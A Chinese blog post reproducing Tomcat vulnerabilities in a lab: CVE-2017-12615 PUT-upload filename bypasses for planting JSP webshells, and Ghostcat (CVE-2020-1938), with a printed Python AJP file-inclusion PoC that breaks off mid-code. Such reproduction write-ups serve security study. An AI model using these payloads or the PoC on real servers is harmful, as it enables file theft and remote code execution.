
  <!DOCTYPE html>
  <html lang="zh-CN"  data-theme="dark" >
  <head>
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="utf-8">
  
  <!-- Global site tag (gtag.js) - Google Analytics -->
  <script src="https://www.googletagmanager.com/gtag/js?id=true"></script>
  <script data-pjax>
    window.dataLayer = window.dataLayer || [];

    function gtag() {
      dataLayer.push(arguments);
    }

    gtag('js', new Date());

    gtag('config', 'true');
  </script>
  <!-- End Google Analytics -->


  

  
  <script async src="https://hm.baidu.com/hm.js?true"></script>
  <script data-pjax>
    var _hmt = _hmt || [];
    _hmt.push(["_trackPageview", location.pathname]);
  </script>


  
  <script>window.icon_font = '4552607_tq6stt6tcg';window.clipboard_tips = {"success":"复制成功(*^▽^*)","fail":"复制失败 (ﾟ⊿ﾟ)ﾂ","copyright":{"enable":false,"count":50,"content":"本文版权：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！"}};window.outdate = {"enable":true,"daysAgo":180,"message":"本文最后更新于 {time}，请注意文中内容可能已经发生变化。"};</script>
  
  
  <title>
    Tomcat 漏洞复现集合 |
    
    yyjccc的博客
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CUbuntu%20Mono:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CUbuntu%20Mono:400,400italic,700,700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
  
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_tq6stt6tcg.woff2" as="font" type="font/woff2" crossorigin="anonymous">
  
  
    
<link rel="stylesheet" href="/css/loader.css">

  
  <meta name="description" content="Tomcat 漏洞复现集合Tomcat是常见的web中间间，常用于javaweb Tomcat是Apache 软件基金会（Apache Software Foundation）的Jakarta 项目中的一个核心项目，由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持，最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现，Tomcat 5支持最新的">
<meta property="og:type" content="article">
<meta property="og:title" content="Tomcat 漏洞复现集合">
<meta property="og:url" content="https://yyjccc.github.io/2024/05/13/Tomcat-%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E9%9B%86%E5%90%88/index.html">
<meta property="og:site_name" content="yyjccc的博客">
<meta property="og:description" content="Tomcat 漏洞复现集合Tomcat是常见的web中间间，常用于javaweb Tomcat是Apache 软件基金会（Apache Software Foundation）的Jakarta 项目中的一个核心项目，由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持，最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现，Tomcat 5支持最新的">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://yyjccc.github.io/img/24-5-13/1.png">
<meta property="og:image" content="https://yyjccc.github.io/img/24-5-13/2.png">
<meta property="og:image" content="https://yyjccc.github.io/img/24-5-13/3.png">
<meta property="og:image" content="https://yyjccc.github.io/img/24-5-13/4.png">
<meta property="og:image" content="https://yyjccc.github.io/img/24-5-13/5.png">
<meta property="og:image" content="https://yyjccc.github.io/img/24-5-13/6.png">
<meta property="og:image" content="https://yyjccc.github.io/img/24-5-13/7.png">
<meta property="og:image" content="https://yyjccc.github.io/img/24-5-13/8.png">
<meta property="article:published_time" content="2024-05-13T09:21:13.735Z">
<meta property="article:modified_time" content="2024-05-13T09:29:01.076Z">
<meta property="article:author" content="Yyjccc">
<meta property="article:tag" content="Tomcat">
<meta property="article:tag" content="web中间件">
<meta property="article:tag" content="漏洞复现">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://yyjccc.github.io/img/24-5-13/1.png">
  
    <link rel="alternate" href="/atom.xml" title="yyjccc的博客" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/images/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
  
  
  
    
      
<link rel="stylesheet" href="https://npm.webcache.cn/gitalk/dist/gitalk.css">

    
  
  
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js"></script>

  
    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.0.1/dist/aos.css">

  
<meta name="generator" content="Hexo 6.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style><!-- hexo-inject:begin --><!-- hexo-inject:end -->
</head>

  <body>
    
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi">
        <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
          <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="#ff5252" />
          <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
         M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="#ff5252" />
        </svg>
      </div>
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var startLoading = () => {
      time = Date.now();
      document.getElementById('loader').classList.remove("loading");
    }
    var endLoading = () => {
      if (!time) {
        document.body.style.overflow = 'auto';
        document.getElementById('loader').classList.add("loading");
      } else {
        if (Date.now() - time > 500) {
          time = null;
          document.body.style.overflow = 'auto';
          document.getElementById('loader').classList.add("loading");
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    document.getElementById('loader').addEventListener('click', endLoading);
  </script>

<div id="copy-tooltip" style="pointer-events: none; opacity: 0; transition: all 0.2s ease; position: fixed;top: 50%;left: 50%;z-index: 999;transform: translate(-50%, -50%);color: white;background: rgba(0, 0, 0, 0.5);padding: 10px 15px;border-radius: 10px;">
</div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav">
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/">首页</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/archives">归档</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/about">关于</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/friend">友链</a>
      </span>
    
    <a id="main-nav-toggle" class="nav-icon"></a>
  </nav>
  <nav id="sub-nav">
    
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS 订阅"></a>
    
    
    
      <a id="nav-search-btn" class="nav-icon popup-trigger" title="搜索"></a>
    
  </nav>
</div>
<header id="header">
  
    
      <img fetchpriority="high" src="/images/banner.webp" alt="Tomcat 漏洞复现集合">
    
  
  <div id="header-outer">
    <div id="header-title">
      
        
        
          <a href="/" id="logo">
            <h1 data-aos="slide-up">Tomcat 漏洞复现集合</h1>
          </a>
        
      
      
        
        <h2 id="subtitle-wrap" data-aos="slide-down">
          
        </h2>
      
    </div>
  </div>
</header>

        <div id="content">
          
          <section id="main"><article id="post-Tomcat-漏洞复现集合" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <a href="/2024/05/13/Tomcat-%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E9%9B%86%E5%90%88/" class="article-date-link" data-aos="zoom-in">
    <time datetime="2024-05-13T09:21:13.735Z" itemprop="datePublished">2024-05-13</time>
    <time style="display: none;" id="post-update-time">2024-05-13</time>
  </a>
</div>

      
  <div class="article-category">
    <a class="article-category-link" href="/categories/web%E5%AE%89%E5%85%A8/" data-aos="zoom-in">web安全</a>
  </div>


    </div>
    <div class="hr-line"></div>
    

    <div class="e-content article-entry" itemprop="articleBody">
      
        <blockquote id="outdate-blockquote" style="display: none;"><p></p></blockquote>
      
      
        <h1 id="Tomcat-漏洞复现集合"><a href="#Tomcat-漏洞复现集合" class="headerlink" title="Tomcat 漏洞复现集合"></a>Tomcat 漏洞复现集合</h1><p><em>Tomcat是常见的web中间间，常用于javaweb</em></p>
<p>Tomcat是Apache 软件基金会（Apache Software Foundation）的Jakarta 项目中的一个核心项目，由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持，最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现，Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定，而且免费，因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可，成为目前比较流行的Web 应用服务器。<br>Tomcat 服务器是一个免费的开放源代码的Web 应用服务器，属于轻量级应用服务器，在中小型系统和并发访问用户不是很多的场合下被普遍使用，是开发和调试JSP 程序的首选。对于一个初学者来说，可以这样认为，当在一台机器上配置好Apache 服务器，可利用它响应HTML（标准通用标记语言下的一个应用）页面的访问请求。实际上Tomcat是Apache 服务器的扩展，但运行时它是独立运行的，所以当你运行tomcat 时，它实际上作为一个与Apache 独立的进程单独运行的。<br>诀窍是，当配置正确时，Apache 为HTML页面服务，而Tomcat 实际上运行JSP 页面和Servlet。另外，Tomcat和IIS等Web服务器一样，具有处理HTML页面的功能，另外它还是一个Servlet和JSP容器，独立的Servlet容器是Tomcat的默认模式。不过，Tomcat处理静态HTML的能力不如Apache服务器。</p>
<h2 id="Tomcat-任意文件写入（CVE-2017-12615"><a href="#Tomcat-任意文件写入（CVE-2017-12615" class="headerlink" title="Tomcat 任意文件写入（CVE-2017-12615"></a>Tomcat 任意文件写入（CVE-2017-12615</h2><h3 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h3><ul>
<li>漏洞简述： 当tomcat启用了HTTP PUT请求方法（例如，将 readonly 初始化参数由默认值设置为 false），攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件，JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。</li>
<li>CVE编号：CVE-2017-12615</li>
<li>影响范围： Tomcat 7.0.0-7.0.81（默认配置）</li>
</ul>
<p>当tomcat启用了HTTP PUT请求方法（例如，将 readonly 初始化参数由默认值设置为 false）</p>
<figure class="highlight xml"><table><tbody><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">init-param</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">param-name</span>&gt;</span>readonly<span class="tag">&lt;/<span class="name">param-name</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">param-value</span>&gt;</span>false<span class="tag">&lt;/<span class="name">param-value</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">init-param</span>&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<h3 id="复现"><a href="#复现" class="headerlink" title="复现"></a>复现</h3><p>vulhub启动Tomcat/CVE-2017-12615<br>抓包改成PUT请求<br>访问的是b.jsp/<br>请求体是文件内容<br><img src="/img/24-5-13/1.png"><br>然后get访问<br><img src="/img/24-5-13/2.png"><br>也是成功存在了b.jsp   这样可以上传一个webshell达到命令执行<br>说明tomcat对jsp是做了一定处理的。那么就考虑是否可以使其处理过程中对文件名的识别存在差异性，前面的流程中 b.jsp/ 识别为非jsp文件，而后续保存文件的时候，文件名不接受/字符，故而忽略掉。</p>
<p>default servlet 和 JSP servlet两个servlet，DefaultServlet的作用是处理静态文件 ，JspServlet 的作用是处理jsp 与jspx 文件的请求，同时DefaultServlet 可以处理 PUT 或 DELETE请求。<br>可以看出即使设置readonly为false，默认tomcat也不允许PUT上传jsp和jspx文件的，因为后端都用org.apache.jasper.servlet.JspServlet来处理jsp或是jspx后缀的请求了，而JspServlet中没有PUT上传的逻辑，PUT的代码实现只存在于DefaultServlet中。<br>这个漏洞的根本是通过构造特殊后缀名，绕过了tomcat检测，让它用DefaultServlet的逻辑去处理请求，从而上传jsp文件。<br>目前主要两种方法：</p>
<ul>
<li>test.jsp::$DATA</li>
<li>test.jsp%20</li>
<li>test.jsp/</li>
</ul>
<p>利用这两种姿势PUT请求tomcat的时候，骗过tomcat而进入DefaultServlet处理的逻辑。<br>我们构造的payload是put方法，所以直接断点进入了 doput：</p>
<p>漏洞原理分析：<br><a target="_blank" rel="noopener" href="https://yaofeifly.github.io/2017/09/25/tomcat/#3%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90">https://yaofeifly.github.io/2017/09/25/tomcat/#3%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90</a></p>
<h2 id="文件读取-包含漏洞（CVE-2020-1938）"><a href="#文件读取-包含漏洞（CVE-2020-1938）" class="headerlink" title="文件读取/包含漏洞（CVE-2020-1938）"></a>文件读取/包含漏洞（CVE-2020-1938）</h2><h3 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h3><p>  默认情况下,Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互.但Apache Tomcat在AJP协议的实现上存在漏洞,导致攻击者可以通过发送恶意的AJP请求,可以读取或者包含Web应用根目录下的任意文件,如果配合文件上传任意格式文件，将可能导致任意代码执行(RCE).该漏洞利用AJP服务端口实现攻击,未开启AJP服务对外不受漏洞影响（tomcat默认将AJP服务开启并绑定至0.0.0.0/0）.</p>
<p><strong>危害</strong><br>攻击者可以读取 Tomcat所有 webapp目录下的任意文件。此外如果网站应用提供文件上传的功能，攻击者可以先向服务端上传一个内容含有恶意 JSP 脚本代码的文件（上传的文件本身可以是任意类型的文件，比如图片、纯文本文件等），然后利用 Ghostcat 漏洞进行文件包含，从而达到代码执行的危害<br><strong>影响范围</strong><br>Apache Tomcat 9.x &lt; 9.0.31<br>Apache Tomcat 8.x &lt; 8.5.51<br>Apache Tomcat 7.x &lt; 7.0.100<br>Apache Tomcat 6.x</p>
<h3 id="条件"><a href="#条件" class="headerlink" title="条件"></a>条件</h3><p>对于处在漏洞影响版本范围内的 Tomcat 而言，若其开启 AJP Connector 且攻击者能够访问 AJP Connector 服务端口的情况下，即存在被 Ghostcat 漏洞利用的风险。注意 Tomcat AJP Connector 默认配置下即为开启状态，且监听在 0.0.0.0:8009 。<br><strong>原理</strong><br>Tomcat 配置了两个Connecto，它们分别是 HTTP 和 AJP ：HTTP默认端口为8080，处理http请求，而AJP默认端口8009，用于处理 AJP 协议的请求，而AJP比http更加优化，多用于反向、集群等，漏洞由于Tomcat AJP协议存在缺陷而导致，攻击者利用该漏洞可通过构造特定参数，读取服务器webapp下的任意文件以及可以包含任意文件，如果有某上传点，上传图片马等等，即可以获取shell</p>
<p>分析：<a target="_blank" rel="noopener" href="https://www.51cto.com/article/746415.html">https://www.51cto.com/article/746415.html</a></p>
<h3 id="poc"><a href="#poc" class="headerlink" title="poc"></a>poc</h3><figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment">#CNVD-2020-10487  Tomcat-Ajp lfi</span></span><br><span class="line"><span class="comment">#by ydhcui</span></span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"><span class="keyword">from</span> io <span class="keyword">import</span> StringIO</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># Some references:</span></span><br><span class="line"><span class="comment"># https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">pack_string</span>(<span class="params">s</span>):</span><br><span class="line">	<span class="keyword">if</span> s <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">		<span class="keyword">return</span> struct.pack(<span class="string">"&gt;h"</span>, -<span class="number">1</span>)</span><br><span class="line">	l = <span class="built_in">len</span>(s)</span><br><span class="line">	<span class="keyword">return</span> struct.pack(<span class="string">"&gt;H%dsb"</span> % l, l, s.encode(<span class="string">'utf8'</span>), <span class="number">0</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">unpack</span>(<span class="params">stream, fmt</span>):</span><br><span class="line">	size = struct.calcsize(fmt)</span><br><span class="line">	buf = stream.read(size)</span><br><span class="line">	<span class="keyword">return</span> struct.unpack(fmt, buf)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">unpack_string</span>(<span class="params">stream</span>):</span><br><span class="line">	size, = unpack(stream, <span class="string">"&gt;h"</span>)</span><br><span class="line">	<span class="keyword">if</span> size == -<span class="number">1</span>: <span class="comment"># null string</span></span><br><span class="line">		<span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line">	res, = unpack(stream, <span class="string">"%ds"</span> % size)</span><br><span class="line">	stream.read(<span class="number">1</span>) <span class="comment"># \0</span></span><br><span class="line">	<span class="keyword">return</span> res</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">NotFoundException</span>(<span class="title class_ inherited__">Exception</span>):</span><br><span class="line">	<span class="keyword">pass</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">AjpBodyRequest</span>(<span class="title class_ inherited__">object</span>):</span><br><span class="line">	<span class="comment"># server == web server, container == servlet</span></span><br><span class="line">	SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = <span class="built_in">range</span>(<span class="number">2</span>)</span><br><span class="line">	MAX_REQUEST_LENGTH = <span class="number">8186</span></span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, data_stream, data_len, data_direction=<span class="literal">None</span></span>):</span><br><span class="line">		self.data_stream = data_stream</span><br><span class="line">		self.data_len = data_len</span><br><span class="line">		self.data_direction = data_direction</span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">serialize</span>(<span class="params">self</span>):</span><br><span class="line">		data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH)</span><br><span class="line">		<span class="keyword">if</span> <span class="built_in">len</span>(data) == <span class="number">0</span>:</span><br><span class="line">			<span class="keyword">return</span> struct.pack(<span class="string">"&gt;bbH"</span>, <span class="number">0x12</span>, <span class="number">0x34</span>, <span class="number">0x00</span>)</span><br><span class="line">		<span class="keyword">else</span>:</span><br><span class="line">			res = struct.pack(<span class="string">"&gt;H"</span>, <span class="built_in">len</span>(data))</span><br><span class="line">			res += data</span><br><span class="line">		<span class="keyword">if</span> self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER:</span><br><span class="line">			header = struct.pack(<span class="string">"&gt;bbH"</span>, <span class="number">0x12</span>, <span class="number">0x34</span>, <span class="built_in">len</span>(res))</span><br><span class="line">		<span class="keyword">else</span>:</span><br><span class="line">			header = struct.pack(<span class="string">"&gt;bbH"</span>, <span class="number">0x41</span>, <span class="number">0x42</span>, <span class="built_in">len</span>(res))</span><br><span class="line">		<span class="keyword">return</span> header + res</span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">send_and_receive</span>(<span class="params">self, socket, stream</span>):</span><br><span class="line">		<span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">			data = self.serialize()</span><br><span class="line">			socket.send(data)</span><br><span class="line">			r = AjpResponse.receive(stream)</span><br><span class="line">			<span class="keyword">while</span> r.prefix_code != AjpResponse.GET_BODY_CHUNK <span class="keyword">and</span> r.prefix_code != AjpResponse.SEND_HEADERS:</span><br><span class="line">				r = AjpResponse.receive(stream)</span><br><span class="line"></span><br><span class="line">			<span class="keyword">if</span> r.prefix_code == AjpResponse.SEND_HEADERS <span class="keyword">or</span> <span class="built_in">len</span>(data) == <span class="number">4</span>:</span><br><span class="line">				<span class="keyword">break</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">AjpForwardRequest</span>(<span class="title class_ inherited__">object</span>):</span><br><span class="line">	_, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = <span class="built_in">range</span>(<span class="number">28</span>)</span><br><span class="line">	REQUEST_METHODS = {<span class="string">'GET'</span>: GET, <span class="string">'POST'</span>: POST, <span class="string">'HEAD'</span>: HEAD, <span class="string">'OPTIONS'</span>: OPTIONS, <span class="string">'PUT'</span>: PUT, <span class="string">'DELETE'</span>: DELETE, <span class="string">'TRACE'</span>: TRACE}</span><br><span class="line">	<span class="comment"># server == web server, container == servlet</span></span><br><span class="line">	SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = <span class="built_in">range</span>(<span class="number">2</span>)</span><br><span class="line">	COMMON_HEADERS = [<span class="string">"SC_REQ_ACCEPT"</span>,</span><br><span class="line">		<span class="string">"SC_REQ_ACCEPT_CHARSET"</span>, <span class="string">"SC_REQ_ACCEPT_ENCODING"</span>, <span class="string">"SC_REQ_ACCEPT_LANGUAGE"</span>, <span class="string">"SC_REQ_AUTHORIZATION"</span>,</span><br><span class="line">		<span class="string">"SC_REQ_CONNECTION"</span>, <span class="string">"SC_REQ_CONTENT_TYPE"</span>, <span class="string">"SC_REQ_CONTENT_LENGTH"</span>, <span class="string">"SC_REQ_COOKIE"</span>, <span class="string">"SC_REQ_COOKIE2"</span>,</span><br><span class="line">		<span class="string">"SC_REQ_HOST"</span>, <span class="string">"SC_REQ_PRAGMA"</span>, <span class="string">"SC_REQ_REFERER"</span>, <span class="string">"SC_REQ_USER_AGENT"</span></span><br><span class="line">	]</span><br><span class="line">	ATTRIBUTES = [<span class="string">"context"</span>, <span class="string">"servlet_path"</span>, <span class="string">"remote_user"</span>, <span class="string">"auth_type"</span>, <span class="string">"query_string"</span>, <span class="string">"route"</span>, <span class="string">"ssl_cert"</span>, <span class="string">"ssl_cipher"</span>, <span class="string">"ssl_session"</span>, <span class="string">"req_attribute"</span>, <span class="string">"ssl_key_size"</span>, <span class="string">"secret"</span>, <span class="string">"stored_method"</span>]</span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, data_direction=<span class="literal">None</span></span>):</span><br><span class="line">		self.prefix_code = <span class="number">0x02</span></span><br><span class="line">		self.method = <span class="literal">None</span></span><br><span class="line">		self.protocol = <span class="literal">None</span></span><br><span class="line">		self.req_uri = <span class="literal">None</span></span><br><span class="line">		self.remote_addr = <span class="literal">None</span></span><br><span class="line">		self.remote_host = <span class="literal">None</span></span><br><span class="line">		self.server_name = <span class="literal">None</span></span><br><span class="line">		self.server_port = <span class="literal">None</span></span><br><span class="line">		self.is_ssl = <span class="literal">None</span></span><br><span class="line">		self.num_headers = <span class="literal">None</span></span><br><span class="line">		self.request_headers = <span class="literal">None</span></span><br><span class="line">		self.attributes = <span class="literal">None</span></span><br><span class="line">		self.data_direction = data_direction</span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">pack_headers</span>(<span class="params">self</span>):</span><br><span class="line">		self.num_headers = <span class="built_in">len</span>(self.request_headers)</span><br><span class="line">		res = <span class="string">""</span></span><br><span class="line">		res = struct.pack(<span class="string">"&gt;h"</span>, self.num_headers)</span><br><span class="line">		<span class="keyword">for</span> h_name <span class="keyword">in</span> self.request_headers:</span><br><span class="line">			<span class="keyword">if</span> h_name.startswith(<span class="string">"SC_REQ"</span>):</span><br><span class="line">				code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + <span class="number">1</span></span><br><span class="line">				res += struct.pack(<span class="string">"BB"</span>, <span class="number">0xA0</span>, code)</span><br><span class="line">			<span class="keyword">else</span>:</span><br><span class="line">				res += pack_string(h_name)</span><br><span class="line"></span><br><span class="line">			res += pack_string(self.request_headers[h_name])</span><br><span class="line">		<span class="keyword">return</span> res</span><br><span class="line"></span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">pack_attributes</span>(<span class="params">self</span>):</span><br><span class="line">		res = <span class="string">b""</span></span><br><span class="line">		<span class="keyword">for</span> attr <span class="keyword">in</span> self.attributes:</span><br><span class="line">			a_name = attr[<span class="string">'name'</span>]</span><br><span class="line">			code = AjpForwardRequest.ATTRIBUTES.index(a_name) + <span class="number">1</span></span><br><span class="line">			res += struct.pack(<span class="string">"b"</span>, code)</span><br><span class="line">			<span class="keyword">if</span> a_name == <span class="string">"req_attribute"</span>:</span><br><span class="line">				aa_name, a_value = attr[<span class="string">'value'</span>]</span><br><span class="line">				res += pack_string(aa_name)</span><br><span class="line">				res += pack_string(a_value)</span><br><span class="line">			<span class="keyword">else</span>:</span><br><span class="line">				res += pack_string(attr[<span class="string">'value'</span>])</span><br><span class="line">		res += struct.pack(<span class="string">"B"</span>, <span class="number">0xFF</span>)</span><br><span class="line">		<span class="keyword">return</span> res</span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">serialize</span>(<span class="params">self</span>):</span><br><span class="line">		res = <span class="string">""</span></span><br><span class="line">		res = struct.pack(<span class="string">"bb"</span>, self.prefix_code, self.method)</span><br><span class="line">		res += pack_string(self.protocol)</span><br><span class="line">		res += pack_string(self.req_uri)</span><br><span class="line">		res += pack_string(self.remote_addr)</span><br><span class="line">		res += pack_string(self.remote_host)</span><br><span class="line">		res += pack_string(self.server_name)</span><br><span class="line">		res += struct.pack(<span class="string">"&gt;h"</span>, self.server_port)</span><br><span class="line">		res += struct.pack(<span class="string">"?"</span>, self.is_ssl)</span><br><span class="line">		res += self.pack_headers()</span><br><span class="line">		res += self.pack_attributes()</span><br><span class="line">		<span class="keyword">if</span> self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER:</span><br><span class="line">			header = struct.pack(<span class="string">"&gt;bbh"</span>, <span class="number">0x12</span>, <span class="number">0x34</span>, <span class="built_in">len</span>(res))</span><br><span class="line">		<span class="keyword">else</span>:</span><br><span class="line">			header = struct.pack(<span class="string">"&gt;bbh"</span>, <span class="number">0x41</span>, <span class="number">0x42</span>, <span class="built_in">len</span>(res))</span><br><span class="line">		<span class="keyword">return</span> header + res</span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">parse</span>(<span class="params">self, raw_packet</span>):</span><br><span class="line">		stream = StringIO(raw_packet)</span><br><span class="line">		self.magic1, self.magic2, data_len = unpack(stream, <span class="string">"bbH"</span>)</span><br><span class="line">		self.prefix_code, self.method = unpack(stream, <span class="string">"bb"</span>)</span><br><span class="line">		self.protocol = unpack_string(stream)</span><br><span class="line">		self.req_uri = unpack_string(stream)</span><br><span class="line">		self.remote_addr = unpack_string(stream)</span><br><span class="line">		self.remote_host = unpack_string(stream)</span><br><span class="line">		self.server_name = unpack_string(stream)</span><br><span class="line">		self.server_port = unpack(stream, <span class="string">"&gt;h"</span>)</span><br><span class="line">		self.is_ssl = unpack(stream, <span class="string">"?"</span>)</span><br><span class="line">		self.num_headers, = unpack(stream, <span class="string">"&gt;H"</span>)</span><br><span class="line">		self.request_headers = {}</span><br><span class="line">		<span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(self.num_headers):</span><br><span class="line">			code, = unpack(stream, <span class="string">"&gt;H"</span>)</span><br><span class="line">			<span class="keyword">if</span> code &gt; <span class="number">0xA000</span>:</span><br><span class="line">				h_name = AjpForwardRequest.COMMON_HEADERS[code - <span class="number">0xA001</span>]</span><br><span class="line">			<span class="keyword">else</span>:</span><br><span class="line">				h_name = unpack(stream, <span class="string">"%ds"</span> % code)</span><br><span class="line">				stream.read(<span class="number">1</span>) <span class="comment"># \0</span></span><br><span class="line">			h_value = unpack_string(stream)</span><br><span class="line">			self.request_headers[h_name] = h_value</span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">send_and_receive</span>(<span class="params">self, socket, stream, save_cookies=<span class="literal">False</span></span>):</span><br><span class="line">		res = []</span><br><span class="line">		i = socket.sendall(self.serialize())</span><br><span class="line">		<span class="keyword">if</span> self.method == AjpForwardRequest.POST:</span><br><span class="line">			<span class="keyword">return</span> res</span><br><span class="line"></span><br><span class="line">		r = AjpResponse.receive(stream)</span><br><span class="line">		<span class="keyword">assert</span> r.prefix_code == AjpResponse.SEND_HEADERS</span><br><span class="line">		res.append(r)</span><br><span class="line">		<span class="keyword">if</span> save_cookies <span class="keyword">and</span> <span class="string">'Set-Cookie'</span> <span class="keyword">in</span> r.response_headers:</span><br><span class="line">			self.headers[<span class="string">'SC_REQ_COOKIE'</span>] = r.response_headers[<span class="string">'Set-Cookie'</span>]</span><br><span class="line"></span><br><span class="line">		<span class="comment"># read body chunks and end response 